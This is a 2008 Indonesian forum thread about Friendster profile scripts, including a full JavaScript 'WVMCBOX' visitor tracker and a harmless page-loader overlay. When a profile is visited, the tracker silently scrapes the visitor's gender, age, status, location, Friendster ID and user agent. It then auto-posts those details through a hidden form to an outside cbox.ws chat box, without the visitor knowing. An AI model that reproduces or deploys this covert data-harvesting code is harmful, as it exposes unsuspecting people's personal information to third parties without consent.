js linker quh da gag jaLan ne..
gmn dhum?
ada yg M O baNtuin aq gag?
KAsihaNiLah newbie ini...[/quote]
udah saya PM tadi ke kk,
[quote=dwiki]



gag da yg mO bantUin aq yagh...
hugs.....
newbie cRy....[/quote]
udah saya PM tadi ke kk
Last edited by robbinhood (2008-06-29 06:12:00)
[b][url=http://theftalk.com/t19440-%7BTUTORIAL%7D-Modifikasi-WVM-2.1-(updated-12-05-08).html]wvm v2.1[/url][/b]
tar kalo ada yang ditanyain..ksini aj lg..
[b]@post dbwh gw[/b]
gw ga bs buka propil lo broth
jd ga ngerti afa keluhannya..
Last edited by fuefuefue (2008-06-29 06:17:55)
Ini Js saia~~~
http://h1.ripway.com/psycomagic/Tracker.js
[quote]/** * WVMCBOX version 2.3.3 * Copyright 2007-2008 by FeRuZZ � http://profiles.friendster.com/feruzz * Timestamp: GMT+8 1.00AM May 15, 2008 * Free to use but not free to resell. * No warranty expressed or implied. Use at your own risk. **/ /*global EventHandler*/ EventHandler = {}; (function () { EventHandler = { add: function (obj, type, fn) { if (obj.addEventListener) { obj.addEventListener(type, fn, false); } else if (obj.attachEvent) { obj["e" + type + fn] = fn; obj[type + fn] = function () { obj["e" + type + fn](window.event); }; obj.attachEvent("on" + type, obj[type + fn]); } else { obj["on" + type] = obj["e" + type + fn]; } }, remove: function (obj, type, fn) { try { obj.removeEventListener(type, fn, false); } catch (e) { try { obj.detachEvent("on" + type, fn); } catch (er) { obj["on" + type] = null; } } } }; })(); /*global WVMCBOX*/ WVMCBOX = {}; (function () { WVMCBOX = { //Private property div: null, date: Date().replace(/\([\S\s]*?\)/, ""), ifstyle: [ "100%", //width "150", //height "auto", //scrolling "yes" //allowtransparency ], base: { "cboxdiv": ["[b]www5[/b], "131531", "q15w8"] }, //null if not exist details: { gender: null, age: null, status: null, location: null, seek: null, since: null }, //get viewer details regexp: { gender: /q">([\S]*male)/i, age: /male,\s*([\d]*),/i, status: /male,\s*[\d]*,\s*([\S\s]*?)<\/span>/i, location: /Location\:\s*<\/span><a[\S\s]*?>([\S\s]*?)<\/a><\/li>/i, seek: /Interested\s*In\:\s*<\/span>([\S\s]*?)<\/li>/i, since: /Member\s*Since\:\s*<\/span>([\w]*?[\s][\d]*?)<\/li>/i }, init: function () { WVMCBOX.ajaxRequest("GET", "http://" + location.hostname + "/" + pageViewerID, true, null, WVMCBOX.viewer, null); var refreshLocation = "window.wvm_submit.location.href=document.getElementById('wvm_submit').src"; window.setInterval(refreshLocation, 30 * 1000); }, viewer: function (htm) { if (htm.replace(/^\s*|\s*$/g, "") === "") { window.alert("ERROR: Empty xmlresponse! \n Unable to parse your details!"); return; } else if (htm) { for (var val in WVMCBOX.details) { if (typeof WVMCBOX.details[val] !== "function") { try { WVMCBOX.details[val] = new RegExp(WVMCBOX.regexp[val]).exec(htm)[1]; } catch (e) { WVMCBOX.details[val] = ""; } } } if (WVMCBOX.details.seek === "") { WVMCBOX.details.seek = "Just looking around"; } for (var seeboks in WVMCBOX.base) { if (typeof WVMCBOX.base[seeboks] !== "function") { var htmlspaces = "&nb" + "sp;"; var htmlbulls = "&bu" + "ll;"; WVMCBOX.div = "<iframe frameborder=\"0\" width=\"" + WVMCBOX.ifstyle[0] + "\" height=\"" + WVMCBOX.ifstyle[1] + "\" scrolling=\"" + WVMCBOX.ifstyle[2] + "\" allowtransparency=\"" + WVMCBOX.ifstyle[3] + "\" marginheight=\"2\" marginwidth=\"2\" src=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=main\" name=\"wvm_submit\" id=\"wvm_submit\"></iframe>" + "<div style=\"display:none\">" + "<form name=\"wvmcboxform\" id=\"wvmcboxform\" target=\"wvm_submit\" action=\"http://" + WVMCBOX.base[seeboks][0] + ".cbox.ws/box/?boxid=" + WVMCBOX.base[seeboks][1] + "&boxtag=" + WVMCBOX.base[seeboks][2] + "&sec=submit\" method=\"POST\">" + "<input type=\"text\" name=\"nme\" value=\"" + pageViewerFName + "\">" + "<input type=\"text\" name=\"eml\" value=\"http://" + location.hostname + "/" + pageViewerID + "\">" + "<textarea style=\"overflow:hidden\" class=\"cboxMsgArea\" maxlength=\"200\" cols=\"22\" rows=\"3\" name=\"pst\">" + WVMCBOX.date + "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.gender + "," + htmlspaces + "" + WVMCBOX.details.age + "," + htmlspaces + "" + WVMCBOX.details.status.replace(/<[\S]*?>/g, "").replace(/TM/g, "TM") + "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.since.replace(/^\s*[\w]*?/gi, "Member Since: ") + "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.seek.replace(/^\s*[\S\s]*?/gi, "Interested In: ") + "[br]" + htmlbulls + "" + htmlspaces + "" + WVMCBOX.details.location.replace(/^\s*[\S\s]*?/gi, "Location: ") + "[br]" + htmlbulls + "" + htmlspaces + "" + pageViewerID.replace(/^\s*[\d]*?/gi, "Friendster ID: ") + "[br]" + htmlbulls + "" + htmlspaces + "" + navigator.appName.replace(/^\s*[\S\s]*?/gi, "Browser: ") + "[br]" + htmlbulls + "" + htmlspaces + "" + navigator.userAgent + "</textarea>" + "</form>" + "</div>"; addBox("LEFT","<a href=\"#\" onClick=\"show_hide('content_wvmcbox'); return false\"><blink>"+pageOwnerFName+"'s Visitors Data</blink></a>", "<div id=\"" + seeboks + "\" align=\"center\">" + WVMCBOX.div + "</div>", "wvmcbox","6"); show_hide('content_wvmcbox'); } } if ((pageViewerID !== pageOwnerID) && (pageViewerID !== "")) { if (document.wvmcboxform) { document.wvmcboxform.submit(); } else { document.getElementById("wvmcboxform").submit(); } } } }, ajaxRequest: function (type, url, async, param, func, handlerparam) { /** * ajaxRequest - You may not remove or change this notice. * version: 2.4 * Copyright 2008 by FeRuZZ � http://profiles.friendster.com/feruzz. * * @type: "GET" | "POST" * @async: true | false * @param: string | null * @func: string | null * @handlerparam: string | null **/ var httprequest = null; var requestDone = false; var data = null; var responseType = "text"; var timeout = 0; var ival = null; var onreadystatechange = {}; var msxml = ["Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0", "Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]; for (var x = 0, len = msxml.length; x < len; x += 1) { try { httprequest = window.ActiveXObject ? new ActiveXObject(msxml[x]) : new XMLHttpRequest(); break; } catch (e) { if (async) { httprequest = null; } } } if (typeof func === "function") { onreadystatechange = function (isTimeout) { if (!requestDone && httprequest && (httprequest.readyState === 4 || isTimeout === "timeout")) { requestDone = true; if (ival) { window.clearInterval(ival); ival = null; } if (!httprequest.status && location.protocol === "file:" || (httprequest.status >= 200 && httprequest.status < 300) || httprequest.status === 304 || httprequest.status === 1223) { var resPonse = (/xml/i.test(responseType))? httprequest.responseXML : httprequest.responseText; func(resPonse.replace(new RegExp("<script[^>]*>.*?<\/script>", "gi"), ""), handlerparam); } } }; } if (async) { ival = window.setInterval(onreadystatechange, 13); if (timeout > 0) { window.setTimeout(function () { if (httprequest) { httprequest.abort(); if (!requestDone) { onreadystatechange("timeout"); } } }, timeout); } } if (type === "GET" && (/GET/i.test(type))) { var ts = new Date().getTime(); var ret = url.replace(/(\?|&)_=[\S\s]*?(&|$)/, "$1_=" + ts + "$2"); url = ret + ((ret === url) ? (url.match(/\?/) ? "&" : "?") + "_=" + ts : ""); } if (data && type === "GET" && (/GET/i.test(type))) { url += (url.match(/\?/) ? "&" : "?") + data; data = null; } if (type === "POST" && (/POST/i.test(type))) { var headers = "application/x-www-form-urlencoded" + ("UTF-8" ? "; charset=" + "UTF-8" : ""); var contentLength = param ? param.length : 0; try { httprequest.setRequestHeader("Content-type", headers); httprequest.setRequestHeader("Content-length", contentLength); if (httprequest.overrideMimeType && (navigator.userAgent.match(/Gecko\/(\d{4})/) || [0, 2005])[1] < 2005) { httprequest.setRequestHeader("Connection", "close"); } } catch (err) {} } httprequest.open(type, url, async); httprequest.setRequestHeader("ajaxRequest", "true"); httprequest.setRequestHeader("X-Requested-With", "XMLHttpRequest"); httprequest.setRequestHeader("If-Modified-Since", "Thu, 01 Jan 1970 00:00:00 GMT"); httprequest.setRequestHeader("Accept", "text/javascript, application/javascript, text/html, application/xml, text/xml, text/plain, */*"); httprequest.send(param); if (!async) { onreadystatechange(); } } }; })(); /*global addNewBox*/ addNewBox = {}; (function () { addNewBox = { init: function (header, htmlString, id, sibling, insertion) { var sibdiv = document.createElement("div"); sibdiv.className = "commonbox " + id; sibdiv.id = id; if (!header) { header = ""; } else { header = "<h2>" + header + "</h2>"; } sibdiv.innerHTML = header; sibdiv.appendChild(document.createElement("div")); sibdiv.getElementsByTagName("div")[0].id = "content_" + id; sibdiv.getElementsByTagName("div")[0].innerHTML = htmlString; var sibli = document.createElement("li"); sibli.appendChild(sibdiv); var ulTag = addNewBox.boxClassName(sibling)[0]; if (insertion === "below") { ulTag.parentNode.appendChild(sibli); } else if (insertion === "above") { ulTag.parentNode.parentNode.insertBefore(sibli, ulTag.parentNode); } else { ulTag.parentNode.parentNode.appendChild(sibli); } }, boxClassName: function (sClass) { var doc = document; var sTagName = "*"; var elm = []; var els = (sTagName && doc.all) ? doc.all : doc.getElementsByTagName(sTagName); for (var j = 0, k = els.length; j < k; j += 1) { if (new RegExp(sClass).test(els[j].className)) { elm.push(els[j]); } } return elm; } }; })(); EventHandler.add(window, "load", WVMCBOX.init);[/quote]
klo gk bs ,,, gw gk dpt bntu,,, coz,, gw cuma niubi...
Last edited by julyan emo (2008-06-29 06:29:30)
[b]KIDDY[/b]
tolong bantuin yg kmaren post #39732
tmpat gw kok cuepet banged..
ini [spoiler]//loading page
if(navigator.appName=="Netscape") loader=new Loader();
function Loader() {
this.hide=function() {
lding.style.display='none';
}
var lding = document.getElementById('navBg');
var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
lding.innerHTML="<br><br><br><br><br><br><center><img src=\"http://i213.photobucket.com/albums/cc142/sasori_dhimaz/Patrick.gif\"><br><br><br><br><font face='Comic Sans MS' color='#ffffff' size='5'>Met Dateng Yaa "+pageViewerFName+" ....<br><br><br><br><br><blink>eh...!!!</blink><br><br><br>"+pageViewerFName+" ngeteh dulu yuk!!<br><br><img src='http://i213.photobucket.com/albums/cc142/sasori_dhimaz/myhand.jpg'><br><br>tunggu bentar lagi yak...</font><b><br><br><br><br><br><img src='http://h1.ripway.com/SiLebah/gmbar/loadingtime.gif'/></center>";
lding.style.display='';
lding.style.position = 'fixed';
lding.style.top = '0px';
lding.style.left = '0px';
lding.style.width = myWidth;
lding.style.height = myHeight;
lding.style.backgroundImage ="url()";
lding.style.backgroundColor='black';
lding.style.backgroundRepeat='no-repeat';
lding.style.zIndex=20000;
}
setTimeout("loader.hide()",20000);[/spoiler]
yang diedit yang mana??
[b]@angga[/b]
bs liat js sm fs lo ga?
Last edited by fuefuefue (2008-06-29 06:52:48)
sory2
Last edited by uncle_bob (2008-06-29 07:02:52)